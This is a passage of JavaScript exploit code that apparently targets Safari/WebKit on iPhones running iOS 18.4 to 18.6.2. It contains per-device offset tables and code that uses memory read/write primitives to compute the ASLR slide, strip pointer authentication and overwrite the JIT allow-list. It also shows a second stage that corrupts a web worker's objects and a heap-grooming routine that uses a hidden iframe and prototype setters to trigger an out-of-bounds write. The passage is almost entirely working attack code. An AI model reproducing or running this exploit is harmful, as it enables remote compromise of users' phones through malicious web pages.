Math.floor(Number(addr) / 0x1000) * 0x1000; 2871 } 2872 function parse_add(addr) { 2873 const insn = Number(read32(addr)); 2874 const off = insn >> 10 & (1 << 12) - 1; 2875 return off; 2876 } 2877 function parse_adrp_add(addr, is_ldrb = false) { 2878 let res = parse_adrp(addr); 2879 let add = parse_add(addr + 4n); 2880 return res + add; 2881 } 2882 const versions = ['b8', '731', 'b9']; 2883 const pthread_create_auth_stubs_offset = { 2884 '18,4': 0x177d640n, 2885 '18,4,1': 0x177d640n, 2886 '18,5': 0x18ccf30n, 2887 '18,6': 0x17a4830n, 2888 '18,6,1': 0x17a4830n, 2889 '18,6,2': 0x17a4830n 2890 }; 2891 const pthread_create_offset = { 2892 '18,4': 0x5864n, 2893 '18,4,1': 0x5864n, 2894 '18,5': 0x6988n, 2895 '18,6': 0x6988n, 2896 '18,6,1': 0x6988n, 2897 '18,6,2': 0x6988n 2898 }; 2899 const linkedit_to_device = { 2900 '18,4': { 2901 [0x27075c000n]: "iPhone11,2_4_6_22E240", 2902 [0x27074c000n]: "iPhone11,8_22E240", 2903 [0x27085c000n]: "iPhone12,1_22E240", 2904 [0x27085c000n]: "iPhone12,3_5_22E240", 2905 [0x270794000n]: "iPhone12,8_22E240", 2906 [0x270ad0000n]: "iPhone13,1_22E240", 2907 [0x2714f8000n]: "iPhone13,2_3_22E240", 2908 [0x2714f8000n]: "iPhone13,4_22E240", 2909 [0x2718dc000n]: "iPhone14,2_22E240", 2910 [0x2718dc000n]: "iPhone14,3_22E240", 2911 [0x270ea4000n]: "iPhone14,4_22E240", 2912 [0x270ea4000n]: "iPhone14,5_22E240", 2913 [0x270e50000n]: "iPhone14,6_22E240", 2914 [0x2712b4000n]: "iPhone14,7_22E240", 2915 [0x2712b4000n]: "iPhone14,8_22E240", 2916 [0x272058000n]: "iPhone15,2_22E240", 2917 [0x272058000n]: "iPhone15,3_22E240", 2918 [0x271680000n]: "iPhone15,4_22E240", 2919 [0x271680000n]: "iPhone15,5_22E240", 2920 [0x272594000n]: "iPhone16,1_22E240", 2921 [0x272594000n]: "iPhone16,2_22E240", 2922 [0x271e5c000n]: "iPhone17,1_22E240", 2923 [0x271e5c000n]: "iPhone17,2_22E240", 2924 [0x2717f0000n]: "iPhone17,3_22E240", 2925 [0x2717f0000n]: "iPhone17,4_22E240", 2926 [0x271530000n]: "iPhone17,5_22E240" 2927 }, 2928 '18,4,1': { 2929 [0x27075c000n]: "iPhone11,2_4_6_22E252", 2930 [0x27074c000n]: "iPhone11,8_22E252", 2931 [0x27085c000n]: "iPhone12,1_22E252", 2932 [0x27085c000n]: "iPhone12,3_5_22E252", 2933 [0x270790000n]: "iPhone12,8_22E252", 2934 [0x270ad0000n]: "iPhone13,1_22E252", 2935 [0x2714f8000n]: "iPhone13,2_3_22E252", 2936 [0x2714f8000n]: "iPhone13,4_22E252", 2937 [0x2718dc000n]: "iPhone14,2_22E252", 2938 [0x2718dc000n]: "iPhone14,3_22E252", 2939 [0x270ea4000n]: "iPhone14,4_22E252", 2940 [0x270ea4000n]: "iPhone14,5_22E252", 2941 [0x270e50000n]: "iPhone14,6_22E252", 2942 [0x2712b4000n]: "iPhone14,7_22E252", 2943 [0x2712b4000n]: "iPhone14,8_22E252", 2944 [0x272058000n]: "iPhone15,2_22E252", 2945 [0x272058000n]: "iPhone15,3_22E252", 2946 [0x271680000n]: "iPhone15,4_22E252", 2947 [0x271680000n]: "iPhone15,5_22E252", 2948 [0x272594000n]: "iPhone16,1_22E252", 2949 [0x272594000n]: "iPhone16,2_22E252", 2950 [0x271e5c000n]: "iPhone17,1_22E252", 2951 [0x271e5c000n]: "iPhone17,2_22E252", 2952 [0x2717f0000n]: "iPhone17,3_22E252", 2953 [0x2717f0000n]: "iPhone17,4_22E252", 2954 [0x271530000n]: "iPhone17,5_22E252" 2955 }, 2956 '18,5': { 2957 [0x27170c000n]: "iPhone11,2_4_6_22F76", 2958 [0x271704000n]: "iPhone11,8_22F76", 2959 [0x271810000n]: "iPhone12,1_22F76", 2960 [0x271810000n]: "iPhone12,3_5_22F76", 2961 [0x27173c000n]: "iPhone12,8_22F76", 2962 [0x271a88000n]: "iPhone13,1_22F76", 2963 [0x2724b4000n]: "iPhone13,2_3_22F76", 2964 [0x2724b4000n]: "iPhone13,4_22F76", 2965 [0x27288c000n]: "iPhone14,2_22F76", 2966 [0x27288c000n]: "iPhone14,3_22F76", 2967 [0x271e5c000n]: "iPhone14,4_22F76", 2968 [0x271e5c000n]: "iPhone14,5_22F76", 2969 [0x271df8000n]: "iPhone14,6_22F76", 2970 [0x272264000n]: "iPhone14,7_22F76", 2971 [0x272264000n]: "iPhone14,8_22F76", 2972 [0x273014000n]: "iPhone15,2_22F76", 2973 [0x273014000n]: "iPhone15,3_22F76", 2974 [0x272634000n]: "iPhone15,4_22F76", 2975 [0x272634000n]: "iPhone15,5_22F76", 2976 [0x27353c000n]: "iPhone16,1_22F76", 2977 [0x27353c000n]: "iPhone16,2_22F76", 2978 [0x272e04000n]: "iPhone17,1_22F76", 2979 [0x272e04000n]: "iPhone17,2_22F76", 2980 [0x2727a0000n]: "iPhone17,3_22F76", 2981 [0x2727a0000n]: "iPhone17,4_22F76", 2982 [0x2724d8000n]: "iPhone17,5_22F76" 2983 }, 2984 '18,6': { 2985 [0x270ffc000n]: "iPhone11,2_4_6_22G86", 2986 [0x270ff0000n]: "iPhone11,8_22G86", 2987 [0x2710fc000n]: "iPhone12,1_22G86", 2988 [0x2710fc000n]: "iPhone12,3_5_22G86", 2989 [0x27103c000n]: "iPhone12,8_22G86", 2990 [0x271378000n]: "iPhone13,1_22G86", 2991 [0x271da8000n]: "iPhone13,2_3_22G86", 2992 [0x271da8000n]: "iPhone13,4_22G86", 2993 [0x272178000n]: "iPhone14,2_22G86", 2994 [0x272178000n]: "iPhone14,3_22G86", 2995 [0x27174c000n]: "iPhone14,4_22G86", 2996 [0x27174c000n]: "iPhone14,5_22G86", 2997 [0x2716f4000n]: "iPhone14,6_22G86", 2998 [0x271b54000n]: "iPhone14,7_22G86", 2999 [0x271b54000n]: "iPhone14,8_22G86", 3000 [0x272904000n]: "iPhone15,2_22G86", 3001 [0x272904000n]: "iPhone15,3_22G86", 3002 [0x271f24000n]: "iPhone15,4_22G86", 3003 [0x271f24000n]: "iPhone15,5_22G86", 3004 [0x272e34000n]: "iPhone16,1_22G86", 3005 [0x272e34000n]: "iPhone16,2_22G86", 3006 [0x2726f4000n]: "iPhone17,1_22G86", 3007 [0x2726f4000n]: "iPhone17,2_22G86", 3008 [0x272084000n]: "iPhone17,3_22G86", 3009 [0x272084000n]: "iPhone17,4_22G86", 3010 [0x271dcc000n]: "iPhone17,5_22G86" 3011 }, 3012 '18,6,1': { 3013 [0x27101c000n]: "iPhone11,2_4_6_22G90", 3014 [0x271004000n]: "iPhone11,8_22G90", 3015 [0x271118000n]: "iPhone12,1_22G90", 3016 [0x271118000n]: "iPhone12,3_5_22G90", 3017 [0x271050000n]: "iPhone12,8_22G90", 3018 [0x27138c000n]: "iPhone13,1_22G90", 3019 [0x271dbc000n]: "iPhone13,2_3_22G90", 3020 [0x271dbc000n]: "iPhone13,4_22G90", 3021 [0x27218c000n]: "iPhone14,2_22G90", 3022 [0x27218c000n]: "iPhone14,3_22G90", 3023 [0x271760000n]: "iPhone14,4_22G90", 3024 [0x271760000n]: "iPhone14,5_22G90", 3025 [0x271708000n]: "iPhone14,6_22G90", 3026 [0x271b6c000n]: "iPhone14,7_22G90", 3027 [0x271b6c000n]: "iPhone14,8_22G90", 3028 [0x272914000n]: "iPhone15,2_22G90", 3029 [0x272914000n]: "iPhone15,3_22G90", 3030 [0x271f38000n]: "iPhone15,4_22G90", 3031 [0x271f38000n]: "iPhone15,5_22G90", 3032 [0x272e4c000n]: "iPhone16,1_22G90", 3033 [0x272e4c000n]: "iPhone16,2_22G90", 3034 [0x27270c000n]: "iPhone17,1_22G90", 3035 [0x27270c000n]: "iPhone17,2_22G90", 3036 [0x2720a4000n]: "iPhone17,3_22G90", 3037 [0x2720a4000n]: "iPhone17,4_22G90", 3038 [0x271de4000n]: "iPhone17,5_22G90" 3039 }, 3040 '18,6,2': { 3041 [0x27101c000n]: "iPhone11,2_4_6_22G100", 3042 [0x271004000n]: "iPhone11,8_22G100", 3043 [0x271118000n]: "iPhone12,1_22G100", 3044 [0x271118000n]: "iPhone12,3_5_22G100", 3045 [0x271050000n]: "iPhone12,8_22G100", 3046 [0x27138c000n]: "iPhone13,1_22G100", 3047 [0x271dbc000n]: "iPhone13,2_3_22G100", 3048 [0x271dbc000n]: "iPhone13,4_22G100", 3049 [0x27218c000n]: "iPhone14,2_22G100", 3050 [0x27218c000n]: "iPhone14,3_22G100", 3051 [0x271760000n]: "iPhone14,4_22G100", 3052 [0x271760000n]: "iPhone14,5_22G100", 3053 [0x271708000n]: "iPhone14,6_22G100", 3054 [0x271b6c000n]: "iPhone14,7_22G100", 3055 [0x271b6c000n]: "iPhone14,8_22G100", 3056 [0x272914000n]: "iPhone15,2_22G100", 3057 [0x272914000n]: "iPhone15,3_22G100", 3058 [0x271f38000n]: "iPhone15,4_22G100", 3059 [0x271f38000n]: "iPhone15,5_22G100", 3060 [0x272e4c000n]: "iPhone16,1_22G100", 3061 [0x272e4c000n]: "iPhone16,2_22G100", 3062 [0x27270c000n]: "iPhone17,1_22G100", 3063 [0x27270c000n]: "iPhone17,2_22G100", 3064 [0x2720a4000n]: "iPhone17,3_22G100", 3065 [0x2720a4000n]: "iPhone17,4_22G100", 3066 [0x271de4000n]: "iPhone17,5_22G100" 3067 } 3068 }; 3069 const device_chipset = { 3070 "iPhone11,2_4_6_22E240": "0b92b8b2602c011d1831c6c27ef74b76", 3071 "iPhone11,8_22E240": "0b92b8b2602c011d1831c6c27ef74b76", 3072 "iPhone12,1_22E240": "f35b705e8c57ae59e369ebc9145a9dbc", 3073 "iPhone12,3_5_22E240": "f35b705e8c57ae59e369ebc9145a9dbc", 3074 "iPhone12,8_22E240": "f35b705e8c57ae59e369ebc9145a9dbc", 3075 "iPhone13,1_22E240": "43ba9900ff2fc7d9d32072540b2cab12", 3076 "iPhone13,2_3_22E240": "43ba9900ff2fc7d9d32072540b2cab12", 3077 "iPhone13,4_22E240": "43ba9900ff2fc7d9d32072540b2cab12", 3078 "iPhone14,2_22E240": "c90776dbac058ed6957f476e287867f8", 3079 "iPhone14,3_22E240": "c90776dbac058ed6957f476e287867f8", 3080 "iPhone14,4_22E240": "c90776dbac058ed6957f476e287867f8", 3081 "iPhone14,5_22E240": "c90776dbac058ed6957f476e287867f8", 3082 "iPhone14,6_22E240": "c90776dbac058ed6957f476e287867f8", 3083 "iPhone14,7_22E240": "c90776dbac058ed6957f476e287867f8", 3084 "iPhone14,8_22E240": "c90776dbac058ed6957f476e287867f8", 3085 "iPhone15,2_22E240": "22f32fd975a694d340a6ad22b872b1ae", 3086 "iPhone15,3_22E240": "22f32fd975a694d340a6ad22b872b1ae", 3087 "iPhone15,4_22E240": "22f32fd975a694d340a6ad22b872b1ae", 3088 "iPhone15,5_22E240": "22f32fd975a694d340a6ad22b872b1ae", 3089 "iPhone16,1_22E240": "c33e4990a9d3afe948b98d7d4205d596", 3090 "iPhone16,2_22E240": "c33e4990a9d3afe948b98d7d4205d596", 3091 "iPhone17,1_22E240": "6149d995753968891870832e3fec9195", 3092 "iPhone17,2_22E240": "6149d995753968891870832e3fec9195", 3093 "iPhone17,3_22E240": "6149d995753968891870832e3fec9195", 3094 "iPhone17,4_22E240": "6149d995753968891870832e3fec9195", 3095 "iPhone17,5_22E240": "6149d995753968891870832e3fec9195", 3096 "iPhone11,2_4_6_22E252": "0b92b8b2602c011d1831c6c27ef74b76", 3097 "iPhone11,8_22E252": "0b92b8b2602c011d1831c6c27ef74b76", 3098 "iPhone12,1_22E252": "f35b705e8c57ae59e369ebc9145a9dbc", 3099 "iPhone12,3_5_22E252": "f35b705e8c57ae59e369ebc9145a9dbc", 3100 "iPhone12,8_22E252": "f35b705e8c57ae59e369ebc9145a9dbc", 3101 "iPhone13,1_22E252": "43ba9900ff2fc7d9d32072540b2cab12", 3102 "iPhone13,2_3_22E252": "43ba9900ff2fc7d9d32072540b2cab12", 3103 "iPhone13,4_22E252": "43ba9900ff2fc7d9d32072540b2cab12", 3104 "iPhone14,2_22E252": "c90776dbac058ed6957f476e287867f8", 3105 "iPhone14,3_22E252": "c90776dbac058ed6957f476e287867f8", 3106 "iPhone14,4_22E252": "c90776dbac058ed6957f476e287867f8", 3107 "iPhone14,5_22E252": "c90776dbac058ed6957f476e287867f8", 3108 "iPhone14,6_22E252": "c90776dbac058ed6957f476e287867f8", 3109 "iPhone14,7_22E252": "c90776dbac058ed6957f476e287867f8", 3110 "iPhone14,8_22E252": "c90776dbac058ed6957f476e287867f8", 3111 "iPhone15,2_22E252": "22f32fd975a694d340a6ad22b872b1ae", 3112 "iPhone15,3_22E252": "22f32fd975a694d340a6ad22b872b1ae", 3113 "iPhone15,4_22E252": "22f32fd975a694d340a6ad22b872b1ae", 3114 "iPhone15,5_22E252": "22f32fd975a694d340a6ad22b872b1ae", 3115 "iPhone16,1_22E252": "c33e4990a9d3afe948b98d7d4205d596", 3116 "iPhone16,2_22E252": "c33e4990a9d3afe948b98d7d4205d596", 3117 "iPhone17,1_22E252": "6149d995753968891870832e3fec9195", 3118 "iPhone17,2_22E252": "6149d995753968891870832e3fec9195", 3119 "iPhone17,3_22E252": "6149d995753968891870832e3fec9195", 3120 "iPhone17,4_22E252": "6149d995753968891870832e3fec9195", 3121 "iPhone17,5_22E252": "6149d995753968891870832e3fec9195", 3122 "iPhone11,2_4_6_22F76": "0b92b8b2602c011d1831c6c27ef74b76", 3123 "iPhone11,8_22F76": "0b92b8b2602c011d1831c6c27ef74b76", 3124 "iPhone12,1_22F76": "f35b705e8c57ae59e369ebc9145a9dbc", 3125 "iPhone12,3_5_22F76": "f35b705e8c57ae59e369ebc9145a9dbc", 3126 "iPhone12,8_22F76": "f35b705e8c57ae59e369ebc9145a9dbc", 3127 "iPhone13,1_22F76": "43ba9900ff2fc7d9d32072540b2cab12", 3128 "iPhone13,2_3_22F76": "43ba9900ff2fc7d9d32072540b2cab12", 3129 "iPhone13,4_22F76": "43ba9900ff2fc7d9d32072540b2cab12", 3130 "iPhone14,2_22F76": "c90776dbac058ed6957f476e287867f8", 3131 "iPhone14,3_22F76": "c90776dbac058ed6957f476e287867f8", 3132 "iPhone14,4_22F76": "c90776dbac058ed6957f476e287867f8", 3133 "iPhone14,5_22F76": "c90776dbac058ed6957f476e287867f8", 3134 "iPhone14,6_22F76": "c90776dbac058ed6957f476e287867f8", 3135 "iPhone14,7_22F76": "c90776dbac058ed6957f476e287867f8", 3136 "iPhone14,8_22F76": "c90776dbac058ed6957f476e287867f8", 3137 "iPhone15,2_22F76": "22f32fd975a694d340a6ad22b872b1ae", 3138 "iPhone15,3_22F76": "22f32fd975a694d340a6ad22b872b1ae", 3139 "iPhone15,4_22F76": "22f32fd975a694d340a6ad22b872b1ae", 3140 "iPhone15,5_22F76": "22f32fd975a694d340a6ad22b872b1ae", 3141 "iPhone16,1_22F76": "c33e4990a9d3afe948b98d7d4205d596", 3142 "iPhone16,2_22F76": "c33e4990a9d3afe948b98d7d4205d596", 3143 "iPhone17,1_22F76": "6149d995753968891870832e3fec9195", 3144 "iPhone17,2_22F76": "6149d995753968891870832e3fec9195", 3145 "iPhone17,3_22F76": "6149d995753968891870832e3fec9195", 3146 "iPhone17,4_22F76": "6149d995753968891870832e3fec9195", 3147 "iPhone17,5_22F76": "6149d995753968891870832e3fec9195", 3148 "iPhone11,2_4_6_22G86": "0b92b8b2602c011d1831c6c27ef74b76", 3149 "iPhone11,8_22G86": "0b92b8b2602c011d1831c6c27ef74b76", 3150 "iPhone12,1_22G86": "f35b705e8c57ae59e369ebc9145a9dbc", 3151 "iPhone12,3_5_22G86": "f35b705e8c57ae59e369ebc9145a9dbc", 3152 "iPhone12,8_22G86": "f35b705e8c57ae59e369ebc9145a9dbc", 3153 "iPhone13,1_22G86": "43ba9900ff2fc7d9d32072540b2cab12", 3154 "iPhone13,2_3_22G86": "43ba9900ff2fc7d9d32072540b2cab12", 3155 "iPhone13,4_22G86": "43ba9900ff2fc7d9d32072540b2cab12", 3156 "iPhone14,2_22G86": "c90776dbac058ed6957f476e287867f8", 3157 "iPhone14,3_22G86": "c90776dbac058ed6957f476e287867f8", 3158 "iPhone14,4_22G86": "c90776dbac058ed6957f476e287867f8", 3159 "iPhone14,5_22G86": "c90776dbac058ed6957f476e287867f8", 3160 "iPhone14,6_22G86": "c90776dbac058ed6957f476e287867f8", 3161 "iPhone14,7_22G86": "c90776dbac058ed6957f476e287867f8", 3162 "iPhone14,8_22G86": "c90776dbac058ed6957f476e287867f8", 3163 "iPhone15,2_22G86": "22f32fd975a694d340a6ad22b872b1ae", 3164 "iPhone15,3_22G86": "22f32fd975a694d340a6ad22b872b1ae", 3165 "iPhone15,4_22G86": "22f32fd975a694d340a6ad22b872b1ae", 3166 "iPhone15,5_22G86": "22f32fd975a694d340a6ad22b872b1ae", 3167 "iPhone16,1_22G86": "c33e4990a9d3afe948b98d7d4205d596", 3168 "iPhone16,2_22G86": "c33e4990a9d3afe948b98d7d4205d596", 3169 "iPhone17,1_22G86": "6149d995753968891870832e3fec9195", 3170 "iPhone17,2_22G86": "6149d995753968891870832e3fec9195", 3171 "iPhone17,3_22G86": "6149d995753968891870832e3fec9195", 3172 "iPhone17,4_22G86": "6149d995753968891870832e3fec9195", 3173 "iPhone17,5_22G86": "6149d995753968891870832e3fec9195", 3174 "iPhone11,2_4_6_22G90": "0b92b8b2602c011d1831c6c27ef74b76", 3175 "iPhone11,8_22G90": "0b92b8b2602c011d1831c6c27ef74b76", 3176 "iPhone12,1_22G90": "f35b705e8c57ae59e369ebc9145a9dbc", 3177 "iPhone12,3_5_22G90": "f35b705e8c57ae59e369ebc9145a9dbc", 3178 "iPhone12,8_22G90": "f35b705e8c57ae59e369ebc9145a9dbc", 3179 "iPhone13,1_22G90": "43ba9900ff2fc7d9d32072540b2cab12", 3180 "iPhone13,2_3_22G90": "43ba9900ff2fc7d9d32072540b2cab12", 3181 "iPhone13,4_22G90": "43ba9900ff2fc7d9d32072540b2cab12", 3182 "iPhone14,2_22G90": "c90776dbac058ed6957f476e287867f8", 3183 "iPhone14,3_22G90": "c90776dbac058ed6957f476e287867f8", 3184 "iPhone14,4_22G90": "c90776dbac058ed6957f476e287867f8", 3185 "iPhone14,5_22G90": "c90776dbac058ed6957f476e287867f8", 3186 "iPhone14,6_22G90": "c90776dbac058ed6957f476e287867f8", 3187 "iPhone14,7_22G90": "c90776dbac058ed6957f476e287867f8", 3188 "iPhone14,8_22G90": "c90776dbac058ed6957f476e287867f8", 3189 "iPhone15,2_22G90": "22f32fd975a694d340a6ad22b872b1ae", 3190 "iPhone15,3_22G90": "22f32fd975a694d340a6ad22b872b1ae", 3191 "iPhone15,4_22G90": "22f32fd975a694d340a6ad22b872b1ae", 3192 "iPhone15,5_22G90": "22f32fd975a694d340a6ad22b872b1ae", 3193 "iPhone16,1_22G90": "c33e4990a9d3afe948b98d7d4205d596", 3194 "iPhone16,2_22G90": "c33e4990a9d3afe948b98d7d4205d596", 3195 "iPhone17,1_22G90": "6149d995753968891870832e3fec9195", 3196 "iPhone17,2_22G90": "6149d995753968891870832e3fec9195", 3197 "iPhone17,3_22G90": "6149d995753968891870832e3fec9195", 3198 "iPhone17,4_22G90": "6149d995753968891870832e3fec9195", 3199 "iPhone17,5_22G90": "6149d995753968891870832e3fec9195", 3200 "iPhone11,2_4_6_22G100": "0b92b8b2602c011d1831c6c27ef74b76", 3201 "iPhone11,8_22G100": "0b92b8b2602c011d1831c6c27ef74b76", 3202 "iPhone12,1_22G100": "f35b705e8c57ae59e369ebc9145a9dbc", 3203 "iPhone12,3_5_22G100": "f35b705e8c57ae59e369ebc9145a9dbc", 3204 "iPhone12,8_22G100": "f35b705e8c57ae59e369ebc9145a9dbc", 3205 "iPhone13,1_22G100": "43ba9900ff2fc7d9d32072540b2cab12", 3206 "iPhone13,2_3_22G100": "43ba9900ff2fc7d9d32072540b2cab12", 3207 "iPhone13,4_22G100": "43ba9900ff2fc7d9d32072540b2cab12", 3208 "iPhone14,2_22G100": "c90776dbac058ed6957f476e287867f8", 3209 "iPhone14,3_22G100": "c90776dbac058ed6957f476e287867f8", 3210 "iPhone14,4_22G100": "c90776dbac058ed6957f476e287867f8", 3211 "iPhone14,5_22G100": "c90776dbac058ed6957f476e287867f8", 3212 "iPhone14,6_22G100": "c90776dbac058ed6957f476e287867f8", 3213 "iPhone14,7_22G100": "c90776dbac058ed6957f476e287867f8", 3214 "iPhone14,8_22G100": "c90776dbac058ed6957f476e287867f8", 3215 "iPhone15,2_22G100": "22f32fd975a694d340a6ad22b872b1ae", 3216 "iPhone15,3_22G100": "22f32fd975a694d340a6ad22b872b1ae", 3217 "iPhone15,4_22G100": "22f32fd975a694d340a6ad22b872b1ae", 3218 "iPhone15,5_22G100": "22f32fd975a694d340a6ad22b872b1ae", 3219 "iPhone16,1_22G100": "c33e4990a9d3afe948b98d7d4205d596", 3220 "iPhone16,2_22G100": "c33e4990a9d3afe948b98d7d4205d596", 3221 "iPhone17,1_22G100": "6149d995753968891870832e3fec9195", 3222 "iPhone17,2_22G100": "6149d995753968891870832e3fec9195", 3223 "iPhone17,3_22G100": "6149d995753968891870832e3fec9195", 3224 "iPhone17,4_22G100": "6149d995753968891870832e3fec9195", 3225 "iPhone17,5_22G100": "6149d995753968891870832e3fec9195", 3226 }; 3227 3228 print(`ios_version: ${ios_version}`); 3229 const pthread_create_got = BigInt(parse_adrp_add(jsc_base + pthread_create_auth_stubs_offset[ios_version])); 3230 print(`pthread_create_got: ${pthread_create_got.hex()}`); 3231 const pthread_create = read64(pthread_create_got).noPAC(); 3232 print(`pthread_create: ${pthread_create.hex()}`); 3233 const libsystem_pthread_base = pthread_create - pthread_create_offset[ios_version]; 3234 print(`libsystem_pthread_base: ${libsystem_pthread_base.hex()}`); 3235 const libsystem_pthread_linkedit = read64(libsystem_pthread_base + 0x600n); 3236 print(`libsystem_pthread_linkedit: ${libsystem_pthread_linkedit.hex()}`); 3237 device_model = linkedit_to_device[ios_version][libsystem_pthread_linkedit]; 3238 print("device_model: " + device_model); 3239 chipset = device_chipset[device_model]; 3240 offsets = rce_offsets[device_model]; 3241 slide = globalFuncParseFloat - offsets.JavaScriptCore__globalFuncParseFloat; 3242 print(`slide: ${slide.hex()}`); 3243 for (const key of Object.keys(offsets)) { 3244 if (offsets[key] >= 0x100000000n) offsets[key] += slide; 3245 } 3246 write64(offsets.JavaScriptCore__jitAllowList_once, 0xffffffffffffffffn); 3247 write64(offsets.JavaScriptCore__jitAllowList + 8n, 1n); 3248 this.stage2(); 3249 return true; 3250 } 3251 3252 stage2() { 3253 print("Inside stage2"); 3254 try 3255 { 3256 const contexts = this.read64(offsets.WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts); 3257 const contexts_length = this.read32(contexts - 4n); 3258 3259 let worker; 3260 3261 for (let i = 0n; i < contexts_length; ++i) { 3262 const scriptExecutionContext = this.read64(contexts + 0x30n * i + 0x20n); 3263 if (!scriptExecutionContext) 3264 continue; 3265 3266 const vtable = this.read64(scriptExecutionContext); 3267 //print(`vtable: ${vtable.noPAC()}`); 3268 if (vtable.noPAC() != offsets.WebCore__DedicatedWorkerGlobalScope_vtable) 3269 continue; 3270 3271 const id = this.read64(scriptExecutionContext + 0x138n); 3272 if (id > maximum_id) { 3273 maximum_id = id; 3274 worker = scriptExecutionContext; 3275 } 3276 } 3277 3278 print(`worker: ${worker.hex()}`); 3279 3280 const script = this.read64(worker + 0x150n); 3281 const workerOrWorkletThread = this.read64(worker + 0x160n); 3282 const Strong_globalScopeWrapper = this.read64(script + 0x20n); 3283 const globalScopeWrapper = this.read64(Strong_globalScopeWrapper); 3284 const worker_global_butterfly = this.read64(globalScopeWrapper + 8n); 3285 print(`butterfly:${worker_global_butterfly.hex()}`); 3286 const unboxed_arr = this.read64(worker_global_butterfly); 3287 const boxed_arr = this.read64(worker_global_butterfly + 8n); 3288 const butterfly = this.read64(boxed_arr + 8n); 3289 this.write64(unboxed_arr + 8n, butterfly); 3290 print("Finished stage2 succesfully"); 3291 } 3292 catch(e) 3293 { 3294 print("got error in stage2: " + e); 3295 } 3296 } 3297 3298 3299 start() { 3300 const victim_array_allocation_size = (0x120>>3); 3301 const victim_array_allocations_in_page = 50; 3302 var victim_cursor = 0; 3303 3304 const egg1 = 0x5f2893ab; 3305 const egg2 = 0x163967eb; 3306 const victim_list_size = 4*victim_array_allocations_in_page; 3307 3308 //FIXME change "victim" to "victim", they don't serve the same purpose here. 3309 const victim_array_RO = () => {return [1.1,2.2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8];} 3310 var victim_list = new Array(victim_list_size).fill(1.1); 3311 3312 var the_oob_object = new Array(); 3313 the_oob_object[14] = 1.1; 3314 for(let i = 0 ; i < 12; i++){ 3315 the_oob_object[i] = i; 3316 } 3317 3318 //var the_oob_object = the_oob_object_RO(); 3319 //the_oob_object[0] = 1.1; // we do this allocation now so thatonly on double->withStorage we will allocate. 3320 //we count on COW to get us the rigth array sizes 3321 // we can probably use fill but whatever... 3322 for (let i = 0; i < victim_list_size; i++){ 3323 victim_list[i] = victim_array_RO(); 3324 } 3325 3326 for (let i = 0; i < 2; i++){ 3327 for (let j = 0 ; j < victim_array_allocations_in_page; j++){ 3328 victim_list[victim_cursor][0] = i; 3329 victim_list[victim_cursor][1] = egg1; 3330 victim_list[victim_cursor][2] = egg2; 3331 victim_list[victim_cursor][3] = victim_cursor; 3332 victim_cursor++; 3333 } 3334 } 3335 3336 for(let j = 0; j < 5; j++){ 3337 victim_list[victim_cursor][0] = 3; 3338 victim_list[victim_cursor][1] = egg1; 3339 victim_list[victim_cursor][2] = egg2; 3340 victim_list[victim_cursor][3] = victim_cursor; 3341 victim_cursor++; 3342 } 3343 3344 the_oob_object[1001] = 1.1; 3345 the_oob_object.length = 31; 3346 delete the_oob_object[0]; 3347 for(let i = 1; i < 31; i++){ 3348 the_oob_object[i] = 1.1; 3349 } //object should have 0x1e(30) items loaded, we want to overwrite +0x25(37) 3350 const oob_object_target_length = 32; 3351 the_oob_object.length = oob_object_target_length; 3352 const holes_to_add = (oob_object_target_length - 30); 3353 3354 for (let j = 6 ; j < victim_array_allocations_in_page; j++){ 3355 victim_list[victim_cursor][0] = 3; 3356 victim_list[victim_cursor][1] = egg1; 3357 victim_list[victim_cursor][2] = egg2; 3358 victim_list[victim_cursor][3] = victim_cursor; 3359 victim_cursor++; 3360 } 3361 3362 for (let i = 0; i < 1; i++){ 3363 for (let j = 0 ; j < victim_array_allocations_in_page; j++){ 3364 victim_list[victim_cursor][0] = i; 3365 victim_list[victim_cursor][1] = egg1; 3366 victim_list[victim_cursor][2] = egg2; 3367 victim_list[victim_cursor][3] = victim_cursor; 3368 victim_cursor++; 3369 } 3370 } 3371 3372 let iframe_elem = document.createElement('iframe'); 3373 iframe_elem.style.visibility = 'hidden'; 3374 let otherGlobalObject = document.body.appendChild(iframe_elem).contentWindow; 3375 let z = new otherGlobalObject.Array(1); 3376 3377 otherGlobalObject.dopush_contigious = (x) => { 3378 x.push(1.1,z,2,3,4,5,6,7,8,9,1,2,3,4,5,6,1.1,z,2,3,4,5,6,7,8,9,1,2,3,4,5,6,1.1,z,2,3,4,5,6,7,8,9,1,2,3,4,5,6,1.1,z,2,3,4,5,6,7,8,9,1,2,3,4,5,6,1.1,z,2,3,4,5,6,7,8,9,1,2,3,4,5,6); 3379 } 3380 3381 otherGlobalObject.dontjitme_contigious = () => { 3382 for (let i = 0; i < 10000; i++){ 3383 let regexp = new otherGlobalObject.RegExp('a', 'g'); 3384 let a = new otherGlobalObject.String('a'); 3385 let magic = a.match(regexp); 3386 otherGlobalObject.dopush_contigious(magic); 3387 } 3388 } 3389 3390 const dopush_float = (x) => { 3391 x.push(1.1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0); 3392 } 3393 3394 const dontjitme_float = () => { 3395 for (let i = 0; i < 10000; i++){ 3396 let arr = new Array(1); 3397 arr[0] = 1.1; 3398 dopush_float(arr); 3399 } 3400 } 3401 3402 let oob_object = new Array(1); 3403 oob_object[0] = 1.1; 3404 oob_object[1001] = 1.1; 3405 oob_object.length = 4; 3406 let testvar = undefined; 3407 otherGlobalObject.Object.defineProperty(otherGlobalObject.Array.prototype, 128662, {set(v) {for(let i = 0; i < holes_to_add; i++){ the_oob_object[0] = v;} return 42;}}); null; 3408 3409 let counter = 0; 3410 otherGlobalObject.Object.defineProperty(otherGlobalObject.Array.prototype, 128661, {set() {counter++; if (counter == 1) { doDoubleMagic();} return 42;}}); null; 3411 3412 const doDoubleMagic = () => { 3413 let doublemagic = new Array(1); 3414 doublemagic[0] = 1.1; 3415 dopush_float(doublemagic); 3416 } 3417 3418 otherGlobalObject.domagic = () => { 3419 let regexp = new otherGlobalObject.RegExp('a', 'g'); 3420 let a = new otherGlobalObject.String('a'); 3421 let newmagic = a.match(regexp); 3422 let magic_indexes = new otherGlobalObject.Array(498, 1003, 2008, 4018, 8038, 16078, 32158, 64318, 128636); 3423 for (let i of magic_indexes) { 3424 newmagic[i] = 1; 3425 } 3426 otherGlobalObject.dopush_contigious(newmagic); 3427 return newmagic; 